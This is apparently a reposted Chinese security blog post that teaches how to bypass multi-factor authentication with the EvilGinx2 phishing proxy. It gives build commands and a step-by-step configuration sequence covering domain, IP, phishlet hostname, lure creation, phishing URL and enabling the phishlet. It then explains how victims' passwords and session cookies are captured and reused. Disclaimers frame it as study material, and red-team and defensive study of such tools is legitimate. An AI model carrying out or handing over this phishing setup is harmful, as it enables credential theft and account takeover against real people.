绕过MFA就像1..2..3..!一样简单

admin

138674
文章

114
评论

2023年7月13日14:04:28评论70 views字数 1245阅读4分9秒阅读模式

很久没更新了给大家说句Sorry，最近感觉比较累但不知道在累什么，感谢大家一直的关注，如果担心后续找不到推送的话可以设置一下星标。

免责声明

本公众号仅用于技术交流与学习，利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，本公众号只是知识的搬运工，取之于民用之于民。

绕过MFA就像1..2..3..!一样简单

简介

即使 MFA（多因素身份验证）到位，它仍然可以被攻击者滥用以获得对帐户的访问权限。今天要说的是红队工具EvilGinx2。EvilGinx2 是一个中间人攻击框架，用于钓鱼登录凭据和会话 cookie，从而绕过 MFA 保护。

项目地址：

https://github.com/kgretzky/evilginx2

基本配置

该工具充当浏览器和钓鱼网站之间的代理，使用Go编写，Linux编译运行：

git clone https://github.com/kgretzky/evilginx2.gitgo build./evilginx

Windows下直接运行build_run.bat即可。

程序默认使用phishlets/example.yaml模板克隆作者网站，我们可以根据需要配置phishlets路径下的钓鱼模板。配置方法参考：

https://help.evilginx.com/docs/phishlet-format

实战演练

简单修改模板文件配置钓鱼程序：

绕过MFA就像1..2..3..!一样简单

启动后需要配置域名、IP、phishlets的hostname和lures等：

绕过MFA就像1..2..3..!一样简单

# 配置域名config domain xxx.abc.com# 配置IPconfig ipv4 x.x.x.x# 配置跳转urlconfig redirect_url https://xxx.abc.com# 配置example的hostnamephishlets hostname example xxx.www.abc.com# 为example创建钓鱼诱饵lures create example# 获取钓鱼链接lures get-url 0# 启动钓鱼程序phishlets enable example# 取消隐藏钓鱼程序（否则全部跳转）phishlets unhide example

也可以通过修改config.json进行配置：

绕过MFA就像1..2..3..!一样简单

配置完成后Evilginx2 将根据提供的模板克隆钓鱼网站：

绕过MFA就像1..2..3..!一样简单

当用户访问克隆的网站时，系统将提示他们输入用户名和密码以及 MFA 代码等。然后用户将被重定向到合法网站，一切都将显示正常。然后Evilginx2将能够捕获用户名、密码和身份验证 cookie：

绕过MFA就像1..2..3..!一样简单

然后就可以使用 cookie 编辑器工具导入窃取的 cookie。虽然 MFA 有助于防止未经授权的账户访问，但是仍然有很多方法可以绕过这些保护，黑客总是在寻找绕过它们的方法。

参考博客：

https://medium.com/@jakemcgreevy/bypass-mfa-is-as-easy-as-1-2-3-fb4bdc1f8282

原文始发于微信公众号（Hack All）：绕过MFA就像1..2..3..!一样简单

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

绕过MFA就像1..2..3..!一样简单

网络安全人士必知的MCP和A2A协议

第三方供应商遭勒索软件攻击，中国银行和星展银行11,200名客户受影响

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

发表评论

在线咨询

微信